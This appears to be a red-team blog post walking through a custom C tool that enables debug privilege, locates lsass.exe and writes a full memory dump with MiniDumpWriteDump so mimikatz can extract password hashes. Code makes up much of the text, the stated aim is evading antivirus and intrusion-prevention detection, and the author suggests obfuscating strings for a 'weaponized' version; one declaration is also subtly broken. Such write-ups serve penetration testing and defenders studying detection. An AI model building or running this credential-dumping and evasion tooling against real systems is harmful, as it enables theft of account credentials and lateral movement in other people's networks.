During red team events where you face a Microsoft environment, you may have managed to get one set of credentials or hash that is local admin at least on one machine.

One easy escalation to try is just use those creds on the target machine and dump lsass to extract other hashes (if there are other hashes, using mimikatz, thanks again gentilwiki).

You may have a nice undetected agent you can install that can inject mimikatz in memory but if you don't, you may just want to dump the lsass process with the well known sysinternals utility 'procdump' (afterall, it is a classic windows admin tool that is maybe even already there).

However, dumping lsass with procdump is now quite often flagged by IPS or AV software and avoiding any alert is crutial when performing real attack simulations.

Because I was in this situation, I was wondering if the AV/IPS I was facing was detecting procdump because it was the Sysinternals binary (having some sig for it) or if it was detecting API calls that are needed when trying to dump a process.

Only way was to try to code a small 'procdump' like binary. Looking into how to do it turned out to be simpler than anticipated and pretty effective for AV evasion:

Basically, you want to:

- Get debug privileges (needed to attach to a process you don't own)
- Search for the lsass process
- Attach to it
- Read the whole process space and dump it to disk


## 1. Get debug Privileges

You need to be local admin on the box to request the debug privilege. The code to adjust your current priv token is well documented on Internet so just pasting it for completeness.
Basically, you get a handle on your current token and you add the debug privilege to it. You are then ready to attach to lsass.exe

```c
HANDLE hToken;
TOKEN_PRIVILEGES priv = {0};

if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
                {
                        priv.PrivilegeCount           = 1;
                        priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

                        if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
                        {
                                AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL );
                        }

                        CloseHandle( hToken );
                }
```

## 2. Search for lsaas

You could choose to pass the process ID of lsass.exe to your code or search for it. Searching is done by calling `CreateToolhelp32Snapshot` that returns a list of processes that can be walked through using `Process32First` and `Process32Next`.
You can find a detailed example at [Microsoft doc](https://docs.microsoft.com/en-us/windows/desktop/ToolHelp/taking-a-snapshot-and-viewing-processes)

Here, we walk thought the list of processes and compare their exec name with 'lsass.exe', if it matches, we found it and we keep a handle to it (in the 'ProcID' variable).

```c
HANDLE hProcessSnapshot;
PROCESSENTRY32 pe32;
char strLsass='lsass.exe';

hProcessSnapshot= CreateToolhelp32Snapshot( 2, 0 );
pe32.dwSize = sizeof( PROCESSENTRY32 );
if ( !Process32First ( hProcessSnapshot, &pe32 ) )
  {
        CloseHandle ( hProcessSnapshot );
        return ( FALSE );
  }
do
  {
    if (strcmp(strLsass,pe32.szExeFile) == 0)
        {
                procID=pe32.th32ProcessID;
                break;
        }
  } while( Process32Next( hProcessSnapshot, &pe32 ) );
CloseHandle(hProcessSnapshot);
```

## 3. Attach to lsass

Attaching to a process is one API call, pretty simple:

```c
hProcess = OpenProcess( PROCESS_CREATE_THREAD |
                       PROCESS_QUERY_INFORMATION |
                       PROCESS_VM_OPERATION |
                       PROCESS_VM_WRITE |
                                           PROCESS_VM_READ,
                       FALSE,
                       procID );
```
As always, we keep the return value, a handle to the process we just attached to (lsass.exe here).


## 4. Read the whole lsass process space and dump it to disk

I was prepared to do this manually when I stumbled upon this lovely API call given by Microsoft, `MiniDumpWriteDump`, that is doing all this for you!

Just pass a handle to the process to the API and it will dump it for you, pretty nice!

Here are the specs for the API:
```
BOOL MiniDumpWriteDump(
  HANDLE                            hProcess,
  DWORD                             ProcessId,
  HANDLE                            hFile,
  MINIDUMP_TYPE                     DumpType,
  PMINIDUMP_EXCEPTION_INFORMATION   ExceptionParam,
  PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
  PMINIDUMP_CALLBACK_INFORMATION    CallbackParam
);
```
It just takes a handle to a process, a handle to a file and dump the process image into the file, exactly what we want. The only parameter to lookup is `MINIDUMP_TYPE`, we need it to be set to `MiniDumpWithFullMemory`(0x00000002) as Mimikatz needs a full dump of the process.

Here is the code to have a handle to a file first, then call MiniDumpWriteDump:

```c
hFile = CreateFile(    "mydump",               // name of the file
                       GENERIC_WRITE,          // open for writing
                       0,                      // do not share
                       NULL,                   // default security
                       CREATE_ALWAYS,          // create new file only
                       FILE_ATTRIBUTE_NORMAL,  // normal file
                       NULL);                  // no attr. template

out = MiniDumpWriteDump(hProcess,
                                                procID,
                                                hFile,
                                                0x00000002,
                                                NULL,
                                                NULL,
                                                NULL);
```

## 5. Complete code

For a more weaponized version, you want to remove any comment, print statement, and obfuscate any string used in the code. However, just compiling this version worked all fine, did not trigger the AV nor the IPS in place and mimikatz didn't complain!

You can compile it with the Visual Studio command line C compiler 'Cl.exe' to keep it simple.
I am not a full time coder obviously, launching a full Visual Studio env for 50 lines of C code is not what I am looking for.. Also, I know my choice of variables, lack of error detection and style of coding is not the best, but as a pentester, you rarely have a lot of time and are focused on results :)!

The following shows compilation and usage on a test VM:

![alt text](screenshots/pdump1.jpg "Compiling")

Dumping lsass(as admin):

![alt text](screenshots/pdump2.jpg "Lsass dump")

Testing with mimikatz:

![alt text](screenshots/pdump3.jpg "mimikatz test")

